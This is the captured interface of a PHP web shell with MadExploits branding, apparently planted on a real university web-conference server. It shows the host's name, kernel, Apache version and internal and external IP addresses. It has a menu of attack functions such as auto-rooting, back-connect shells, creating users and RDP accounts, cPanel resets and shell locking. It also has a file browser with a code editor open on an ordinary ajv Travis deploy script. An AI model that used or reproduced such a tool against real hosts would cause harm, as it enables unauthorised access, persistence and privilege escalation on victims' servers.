Linux web-conference.aiou.edu.pk 5.4.0-204-generic #224-Ubuntu SMP Thu Dec 5 13:38:28 UTC 2024 x86_64
Apache/2.4.41 (Ubuntu)
: 172.16.50.247 | : 3.138.174.53
Cant Read [ /etc/named.conf ]
7.4.3-4ubuntu2.28
appadmin
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
BLACK DEFEND!
README
+ Create Folder
+ Create File
/
usr /
share /
nodejs /
ajv /
scripts /
[ HOME SHELL ]
Name
Size
Permission
Action
bundle.js
1.75
KB
-rw-r--r--
compile-dots.js
2.38
KB
-rw-r--r--
info
289
B
-rwxr-xr-x
prepare-tests
269
B
-rwxr-xr-x
publish-built-version
840
B
-rwxr-xr-x
travis-gh-pages
872
B
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : travis-gh-pages
#!/usr/bin/env bash set -e if [[ "$TRAVIS_BRANCH" == "master" && "$TRAVIS_PULL_REQUEST" == "false" && $TRAVIS_JOB_NUMBER =~ ".3" ]]; then git diff --name-only $TRAVIS_COMMIT_RANGE | grep -qE '\.md$|^LICENSE$|travis-gh-pages$' && { rm -rf ../gh-pages git clone -b gh-pages --single-branch https://${GITHUB_TOKEN}@github.com/epoberezkin/ajv.git ../gh-pages mkdir -p ../gh-pages/_source cp *.md ../gh-pages/_source cp LICENSE ../gh-pages/_source currentDir=$(pwd) cd ../gh-pages $currentDir/node_modules/.bin/gh-pages-generator # remove logo from README sed -i -E "s/<img[^>]+ajv_logo[^>]+>//" index.md git config user.email "$GIT_USER_EMAIL" git config user.name "$GIT_USER_NAME" git add . git commit -am "updated by travis build #$TRAVIS_BUILD_NUMBER" git push --quiet origin gh-pages > /dev/null 2>&1 } fi
Close